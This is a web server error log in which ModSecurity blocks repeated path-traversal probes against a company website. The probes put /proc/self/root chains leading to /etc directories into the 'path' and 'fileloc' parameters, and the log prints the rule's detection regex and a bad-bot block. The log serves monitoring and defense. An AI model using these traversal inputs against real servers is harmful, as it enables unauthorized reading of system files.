[Wed Mar 18 08:18:56.344992 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:47238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKICmAPhZkrhU8w4lUNwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:19:05.795482 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:48974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKKdY0UrI5A3LftIyF1gAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:19:10.431778 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.241.31:44414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKLimAPhZkrhU8w4lUOwAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:19:42.798246 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:40876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKTuyqAr6etmhZHNqj9gAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:20:14.214289 2026] [mime_magic:error] [pid 15826:tid 140411540502272] (70014)End of file found: [client 57.141.18.107:51680] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:20:32.467176 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:59466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKgNY0UrI5A3LftIyGiAAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:21:13.844418 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:43174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKqeyqAr6etmhZHNqkOgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:21:31.810946 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:35174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqKu-w_le52K8_3pV3HeQAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:22:58.131345 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:60322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLEsdf6f5d65gmYZS7KgAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:22:58.946832 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.244.43:55468] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqLEvu8EFLIOrSqIpvsQAAAAkA"]
[Wed Mar 18 08:23:04.279636 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.228.61:37456] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqLGEzinOy1jxa1j4f6RwAAARU"]
[Wed Mar 18 08:23:25.679947 2026] [mime_magic:error] [pid 26799:tid 140411632822016] (70014)End of file found: [client 57.141.18.13:57454] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:23:39.897814 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:43576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLO9Y0UrI5A3LftIyHNAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:23:52.152845 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:50270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLSPu8EFLIOrSqIpvsZAAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:24:23.003971 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:60118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLZwkwaGbbGflqUZD4IQAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:10.747473 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:58682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLluyqAr6etmhZHNqlCQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:12.175507 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:54156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLmNY0UrI5A3LftIyHgAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:13.511623 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:54158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLmeoXxyEfFpUF8f9WRAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:14.817131 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:54166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLmgkwaGbbGflqUZD4PQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:16.162317 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:54178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLnOyqAr6etmhZHNqlGAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:17.515902 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:54180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLneoXxyEfFpUF8f9WSgAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:18.826186 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:54186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLngkwaGbbGflqUZD4PwAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:20.147529 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:42494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLoEzinOy1jxa1j4f6lQAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:21.504938 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:42504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLocdf6f5d65gmYZS7gwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:25:29.223458 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:42508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLqMdf6f5d65gmYZS7lAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
